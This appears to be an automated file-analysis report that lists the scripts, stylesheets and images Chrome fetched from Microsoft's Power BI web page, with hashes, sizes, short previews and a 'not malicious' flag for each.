                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                                    SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                                    SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                                    SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):89501
                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 13 x 36, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):61
                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:94B8D726BFD61DEF5DEA4169E04FF660
                                                                                                                                    SHA1:B05A0481C9C87920CAAD81EB8E0D064102FD5993
                                                                                                                                    SHA-256:755A79565D629D292BC9F1EFEADE838E4E20EEDEBD88A44F3947E4AA887C4968
                                                                                                                                    SHA-512:8BC2D0DEEAAAA947A6362E0E801C6C3B453852412484F07D3452974F05904E788766B23DA6E7058CE43F7BD4665AFB63383EED8990681A8B58917C3FCF750142
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f3848bd0f85ac48/1734452888266/vydshV3DQQ4pSVG
                                                                                                                                    Preview:.PNG........IHDR.......$......*'.....IDAT.....$.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (32197)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):48665
                                                                                                                                    Entropy (8bit):5.397492809727543
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:6CAB0DE42E6BC92FAEDC367FF28099C4
                                                                                                                                    SHA1:A7849EBEB1CE1C7384AE6576D03A80F285802854
                                                                                                                                    SHA-256:ECBD8C69A4D0B69033B1E2BC7F50CE507F2843CE18F345F19DE1D5ECE5FE161E
                                                                                                                                    SHA-512:7EC29242FFAA3FBD47E9D7EC946DA6641A8B2F14A6429BB0BDFC701761BA1E94FF9F2BF65F7B695CBF04E0751F428D670CF25053E1B6828EC160AFC02F4E6C4D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://lpcdn.lpsnmedia.net/le_secure_storage/3.31.1-release_1465379762/storage.secure.min.html?loc=https%3A%2F%2Fpublisher.liveperson.net&site=60270350&env=prod&isCrossDomain=true&accdn=accdn.lpsnmedia.net
                                                                                                                                    Preview:<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><meta http-equiv="X-UA-Compatible" content="IE=100"><script type="text/javascript">window.lpTag=window.lpTag||{},window.lpTag.lzString=window.lpTag.lzString||function(){function e(e,t){if(!o[e]){o[e]={};for(var n=0;n<e.length;n++)o[e][e.charAt(n)]=n}return o[e][t]}var t=String.fromCharCode,n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",o={},a={compressToBase64:function(e){if(null==e)return"";var t=a._compress(e,6,function(e){return n.charAt(e)});switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(t){return null==t?"":""==t?null:a._decompress(t.length,32,function(r){return e(n,t.charAt(r))})},compressToUTF16:function(e){return null==e?"":a._compress(e,15,function(e){return t(e+32)})+" "},decompressFromUTF16:function(e){return null==e?"":""==e?n
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6824)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):404817
                                                                                                                                    Entropy (8bit):5.158669409369658
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F188C864828C7557DFA00F5D1AC4BDBB
                                                                                                                                    SHA1:4110B57316C281CFB0FFEBFD1657965BE0378DBE
                                                                                                                                    SHA-256:A6DCBEB58E98DC1A3ADBC8332B134F1437A0E2A9C26CCE490C3AD92DB93ADB95
                                                                                                                                    SHA-512:00D3F4E99BB0B61D95D7A071473A4BC48404ED133FE72DC3636C60439A82B80D710C1B098C738F543C215DFBB2F2697D0AE24DFEA237469B44EFE7E7D94C4FAC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/en-us/power-platform/products/power-bi/
                                                                                                                                    Preview:<!DOCTYPE HTML> <html lang="en-US" dir="ltr"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <meta http-equiv="x-ua-compatible" content="ie=edge"/> <link rel="SHORTCUT ICON" href="/favicon.ico?v2" type="image/x-icon"/> <meta name="robots" content="index, follow"/> <meta name="template" content="reimagine---product-detail-3"/> <meta name="awa-canvasType" content="web"/> <meta name="awa-isTented" content="false"/> <meta name="awa-pgtmp" content="reimagine---product-detail-3"/> <meta name="awa-pageType" content="Microsoft Power Platform"/> <meta name="awa-market" content="en-us"/> <meta name="awa-cms" content="AEM"/> <meta name="awa-enabledFeatures" content="contentbackfillgenerate;esiproductcards;feature-controlled-mwf;uhf-ms-io-endpoint;uhf-esi-cv;uhf-esi-cache;fraud-greenid;contentsquare;mediapixel;holiday-themer;lazyload-static-components;clientlibDefer;upsellEnabled;contentbackfillpkgdelete;healthcheck;co
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (510)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1973
                                                                                                                                    Entropy (8bit):4.4914538760871165
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:81B1EF0C4A6B80454291234FCD6E45B0
                                                                                                                                    SHA1:1353F3119D378FFB222149AE19755423EF5347BE
                                                                                                                                    SHA-256:B05D865A37D5EFC60E028BC9FBC6B63459C78D21B0B70B3797AC97C1AD9BA88D
                                                                                                                                    SHA-512:6409931AF06BAE75E4CFC57FF2B877915404A9D805F8C9076390C4BC8FF634BA96B2ED561FCC4E57869110E62BE05AB75A1578E7935CEC9605EAA77C893643AD
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-reimagine-base.min.ACSHASH81b1ef0c4a6b80454291234fcd6e45b0.css
                                                                                                                                    Preview:[data-oc-token-text]{display:contents}..editorial-article--chapter .editorial-article__slot .block-heading h1,.editorial-article--chapter .editorial-article__slot .block-heading h2,.editorial-article--chapter .editorial-article__slot .block-heading h3,.editorial-article--chapter .editorial-article__slot .block-heading h4,.editorial-article--chapter .editorial-article__slot .block-heading h5,.editorial-article--chapter .editorial-article__slot .block-heading p{margin-block:var(--root-spacing-xl)}..editorial-article--chapter .editorial-article__slot .block-heading h1:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h2:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h3:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h4:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h5:first-child,.editorial-article--chapter .editorial-article__slot .block-heading p:first-child{ma
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (1999)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):419611
                                                                                                                                    Entropy (8bit):4.980054379765907
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:3CB55A1B7E29CABDED7D23377524B55E
                                                                                                                                    SHA1:5731994750E31D9CD11085570630EAC99DC65845
                                                                                                                                    SHA-256:0953ECFC1629CBBB80658EEC92D00BA89058F6862E5CD742A419412207088D3C
                                                                                                                                    SHA-512:646E5BDE377A885E321790BDF16E07324754C5670B707F1BE4BC11208E2F2E2644189CECE32BFB9C86D51C503F37053D54E1CCC627ECA92D29A20EF2955A69FB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:./*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';.. const ViewPort = {. XS: 0,. SM: 540,. MD: 860,. LG: 1084,. XL: 1400. };. const DetectionUtil = {. /* eslint-disable no-useless-escape, unicorn/better-regex */. detectMobile(includeTabletCheck) {. if (includeTabletCheck === void 0) {. includeTabletCheck = false;. }.. /**. * detect if mobile and/or tablet device. * returns bool. */. let check = false;.. if (includeTabletC
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (17477), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):17477
                                                                                                                                    Entropy (8bit):5.3329406654784774
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:5C5964FF272C4685EC6C283AB9FF4FAE
                                                                                                                                    SHA1:DBD20BBE60E599C9E739E3C209FDE0D2B6CB34EE
                                                                                                                                    SHA-256:E588A55579DC39CA6FD803A67716C08ECD12D45EA14B760BD820CDF5B7EB8326
                                                                                                                                    SHA-512:BA14B05AF884270FEB041CC80F0AA8F643BF3A58386ABFDA889F8E34E5DAFA5045FE2631089EDB2181B03604D643E88F07BB4C31CA44615B21E0BAE35798FAE5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/library/svy/broker.js
                                                                                                                                    Preview:if(void 0===COMSCORE)var COMSCORE={};void 0===COMSCORE.SiteRecruit&&(COMSCORE.SiteRecruit={sv:"scor",testUrl:"broker-test.js",configUrl:"broker-config.js",builderUrl:"builder.js",CONSTANTS:{STATE_NAME:{IDLE:"IDLE",DDINPROGRESS:"DDINPROGRESS"}}},COMSCORE.SiteRecruit.Utils=function(){var r=COMSCORE.SiteRecruit;return{location:document.location.toString(),referrer:document.referrer.toString(),loadScript:function(e,t){t&&!r.allowScriptCaching&&(e=r.Utils.appendQueryParams(e,(new Date).getTime()));var i=document.createElement("script");i.src=e,document.body.appendChild(i)},cleanURL:function(e){var t=e.split("?");if(1<t.length){var r="?";if(/([^.@\s]+)(\.[^.@\s]+)*@([^.@\s]+\.)+([^.@\s]+)|%40/i.test(t[1])){var o=t[1].split("&");for(i=0;i<o.length;i++)/([^.@\s]+)(\.[^.@\s]+)*@([^.@\s]+\.)+([^.@\s]+)|%40/i.test(o[i])||(r+=0==i?o[i]:"&"+o[i]);e=1<r.length?t[0]+r:t[0]}}return e},getDevice:function(e,t){var i=new RegExp(e,"i"),r=navigator.userAgent,o=new RegExp(t,"i"),n=self.screen.availWidth,a={
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (21576), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):21576
                                                                                                                                    Entropy (8bit):4.929076929051309
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:7342360B143714D6D075551721AB7C2C
                                                                                                                                    SHA1:F814CE0526D55CFCC58D36DD5F311B0D46917F48
                                                                                                                                    SHA-256:331AF168FC4B98C4E2C091712C3DDE4CEC15B18E193FDF0965434340766D8355
                                                                                                                                    SHA-512:9F7669FC4DEE253DEEFB2E6BCDEBFD9CB52E3F5C1686A3F508C0D77579EE469F1B02C3C8028C547A4EAAA199798C114B3F7644437185D6D668227D1634440B0C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:lpZonesStaticCB([{"id":138781714,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Right Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":27},{"engagementSubType":24},{"engagementSubType":22},{"engagementSubType":26},{"engagementSubType":19},{"engagementSubType":18},{"engagementSubType":17}],"isDeleted":false},{"id":138781814,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Offsite","deleted":false,"zoneType":2,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":30},{"engagementSubType":29},{"engagementSubType":28}],"isDeleted":false},{"id":138781914,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Left Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":21},{"engagementSubType":14},{"engagementSubType":25},{"engagementSubType":20},{"engagementSubType":16},{"engagementSubType":15},{"engag
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):24164
                                                                                                                                    Entropy (8bit):7.9728819025071305
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:5234169F827F5950655A3D19859D4642
                                                                                                                                    SHA1:546DFBB2D6E94C0787F53139AFAF2517DECF41EC
                                                                                                                                    SHA-256:90B14175DEB32034887E821F126196F5D61A6058273C10F446210C16CD75BDA0
                                                                                                                                    SHA-512:547A05AE3D46AEC9A8CCFB99BA701FFB1EC8F0E22E60644E0D2183584BDF5AEF5E81EC040DE0FA3F434B4BF57811E231F98BFD09AB5CB09672F3B3688F586E21
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF\^..WEBPVP8X........?..7..ALPH^..........@&...i.|.............?.........?.........?.........?.........?.........?....._...VP8 .].......*@.8.>...B!.....a--.....a...1...q.7.....v.0K_>..(I....r..~...x......_.Y.y.........%...,.us.......O.?...m...K.<'...S......n........[.............. ....k~...G...;.....=......'!.NC.l....9.}.r..d.=...{...'!.NC.l......0.....<\....9.}.r..d.=...{...'!.NC.l....9.}.r....'!.NC.l....9.}.r..d.=...{...'!.N|\....aZg.....T.%..rr..d.=...{...'!.NC.l....j......*..|.%.`..d.=...{...'!.NC.l....9.}.tS+J..Dg..v.Q2i.y9.}.r..d.=...{...'!.NC.l....+%&...+C...^.T..6....K....=...{...'!.NC.l....D..+n..H..........*...x.9.}.r..d.=...{....D\.....n....5E..Cz"a..=...{...'!.NC.l......V_......sCq.99.}.r..M#.m..y...`...M}........=...{...'!.NC.l...I.&.G.|M.U v.KJO.......R.%.*.J...T.%..rr..d.=...{.>S.-x.9..j.Eg...|s....j.j..M.}"w.=.r..d.=...{...'!...<..x...k.RqP,..L*$.B..>..\|AKJ.......<..v.l&.-O..{.M.NC.l....9.}.r..d...@....
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2998x1689, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):251168
                                                                                                                                    Entropy (8bit):7.996616972862124
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:324A08893917083A124D5AD55CE1AB1F
                                                                                                                                    SHA1:EC2B692EFD787B5994E3B07165A0A5585830E760
                                                                                                                                    SHA-256:CFDDEC27346DC928CF53560D7B775978975522CCCAEB7F62D0FCCFC4D54388A4
                                                                                                                                    SHA-512:81DF8BF1698049C8C723A8891D5612F564B396E965332AEE85FB50E73EB2A0B37690F302F56975F367DE402B092F641747E18E64C7A89C0E8E552CDA7246AB51
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF....WEBPVP8 .........*....>...B!.Hl.@...Y...~..K..wmK..._.......U@..~...q?K...l...~c.....?..yx.s.w.o........roq^..../.......~.............O...u?.........c.-......._z?....+...../..k.......S.............?....g.{.o................/...............W...?..........K.C.7._.....?.?.}.~........O....o.....................?............W..........c....._./...f...........G.?`.............W...O..............b..........?.{_...?F...O.G.......>....7...>........?.........?Z.....w...........W.....~.{o...?......w......._.............../..a.G.....>R.?......u....}V.........u.....k._.........;.?........[.../....@...2.....g.....?......G........|.}.......?..u...C.....o._...............?......G.........q.3..._.......#...K...O................g......M?..............b..C...b.......v-..;.ov!.{...[.wb..C...b.......v-..;.ov!.{...[.wb..C...b.......v-..;.ov!.{...[.wb..C....6..2...g.............Xm...^m...}'..&,.wb............:.*@G..=..D.U......l.V..o..|.P.(Q..r...
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (24837)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):24949
                                                                                                                                    Entropy (8bit):5.2312828786862395
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:CDAC009AA733269D648461499E0869F2
                                                                                                                                    SHA1:C74BBB5EDC41B9DB60EF45262DF964E7E60A3272
                                                                                                                                    SHA-256:2E38BC618D4A4277FE6D05DA9272A916D12515FB4533C600A4EAE77F68007437
                                                                                                                                    SHA-512:1C9F4CF40DEB7D5E7FA83B3DEE4D5B5AAADCB5A20AEF61DCE2B4A0A1037225E5FB3493F92BCE40F04A02CA9EB791F1AFE6F28A47E3D72F432B2DDF61F3AF45E7
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-02-14T10:24:39Z",turbineBuildDate:"2023-02-22T20:37:26Z",turbineVersion:"27.5.0"},environment:{id:"ENe5ac16c0abde4e0db8a4cd055e2bbf71",stage:"production"},dataElements:{cachebuster:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/randomNumber.js",settings:{max:1e6,min:1}}},extensions:{core:{displayName:"Core",hostedLibFilesBaseUrl:"https://assets.adobedtm.com/extensions/EP2e2f86ba46954a2b8a2b3bb72276b9f8/",modules:{"core/src/lib/dataElements/randomNumber.js":{name:"random-number",displayName:"Random Number",script:function(e){"use strict";e.exports=function(e){var n=Math.ceil(e.min),t=Math.floor(e.max);return n>t?NaN:Math.floor(Math.random()*(t-n+1))+n}}}}}},company:{orgId:"EA76ADE95776D2EC7F000101@AdobeOrg",dynamicCdnEnable
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2998x1689, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):255240
                                                                                                                                    Entropy (8bit):7.9973535790792525
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B6AE999F4573203CF83F1C5F2977DCDD
                                                                                                                                    SHA1:0A0672699CC0A5C4968151E2C3E7092A4CE1F49E
                                                                                                                                    SHA-256:FBAAC47049499B999DE2C557ABD0F20C2F6B9323D3B7380865BEE2E28A7BF5C0
                                                                                                                                    SHA-512:26EDDFA387BC67505D1775D0C7A87E4CAB6CDE7385A565833695DA0DE9DDEBB9A75D4A520650A64121F24F5BED49FB03D0B6C63FD05E3263A14F273244F42472
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF....WEBPVP8 .........*....>...B!.&y!..a,...L.K........z....]...I..G4........4?.......<.2....K.....^.4.Q......._.]....g.w......._3\.....S.....?......5...#...o.:......_..........?......O...o..........c.../................../....?................|e...........>C.;.......?........T.q.{...w...O........!.w.....o.O._...~`~............+........._.&?......i.o.k...o........B.....C.....?....../...............?....f.....g...o.....?.~........_...~0~......o....v.{..._...w..........M.c.....u~.z.._.?...~.|....7.?............?....Y.a......~r...{...o...?b...@.......?..?.}.~.......Q.7.....O....u>....g........{./....i.}...K.W./...?.?....-......._........_...o......^.....o.7................w.o...?........g....?.}..g....................o.?.?..}...#......./.>....?...CL....9.3z..P.t.4..^.B...7.{...NCL....9.3z..P.t.4..^.B...7.{...NCL....9.3z..P.t.4..^.B...7.{...NCL....9.3z..P.t.4..^.B...7.{...NCL....9.3z..P.t.4..^.B...7.{...NCL....9.3z..P.t.4..^.B...7.{...NCL....9.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):11232
                                                                                                                                    Entropy (8bit):4.6331503450371505
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:7FA2105E727E504AAF2557640251B9A6
                                                                                                                                    SHA1:341F9959BEC50971198680145E37E77177F83C6D
                                                                                                                                    SHA-256:C7AAA9B5376FDE8B3DE7A92A84E336A161D4232D6238874173B305CA32567D41
                                                                                                                                    SHA-512:378A637DF8E0905FBE992B8CC9F646A95640EDB4AE8A0ADCFA0DE5BF004B239FC3D5F742991BE0322C79EE72A7FA1F8E6CC68EEBC18BF205D1718FA845C7F7F7
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:(() => {. const ATTRIBUTE_SELECTORS = {. DATA_MOUNT_CHAT_AI_DRAWER: '[data-mount="ai-chat-drawer"]',. };.. const ATTRIBUTES = {. IS_AUTHOR: 'data-is-author',. IS_ENV_PROD: 'data-is-env-prod',. PARAMS: 'data-params',. };.. const EventName = {. KEY_DOWN: 'keydown',. WEBCHAT_CONNECT_FULFILLED: 'webchatconnectfulfilled'. };.. const Selector = {. WEB_CHAT_FEED: '[role="feed"]',. FOOTNOTE_LINK: '.ac-horizontal-separator + .ac-container a, .webchat__link-definitions__list-item-box--as-link',. ACTION_SET_BUTTON: '.ac-pushButton:not(.action--ai-feedback)',. POSITIVE_FEEDBACK_BUTTON: '[id$="-positive"] .ac-pushButton',. NEGATIVE_FEEDBACK_BUTTON: '[id$="-negative"] .ac-pushButton',. RELATED_LINKS: '[id$="-related"] .ac-anchor'. };.. // Constant values for the AI Chat Drawer component.. const IS_AUTHOR = document.querySelector(ATTRIBUTE_SELECTORS.DATA_MOUNT_CHAT_AI_DRAWER).getAttribute
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):309
                                                                                                                                    Entropy (8bit):4.971196656935236
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                                    SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                                    SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                                    SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (512)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):544
                                                                                                                                    Entropy (8bit):5.221040627274746
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                                    SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                                    SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                                    SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-greenid.min.ACSHASH383b23d12df0d9265d7569a7102c2f96.js
                                                                                                                                    Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x428, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):11094
                                                                                                                                    Entropy (8bit):7.983273477396938
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:4A52059E5724C7B556D74E5FC3D0108E
                                                                                                                                    SHA1:BE75CD316DF8806CAB548B54858960AA15377AC2
                                                                                                                                    SHA-256:06E3D819220C54F44C891C3FC1170CCCBCC3F88557AE728CA7073A8800A520D3
                                                                                                                                    SHA-512:A168C6D1EFCA4F930868FC338DA901ACB1F454F057C6EFC81D918014FC19556E4CAAF0C6B2054BAE4AB60C0F1B40B65A2964E589D1846D93D84D7ABB2316514A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
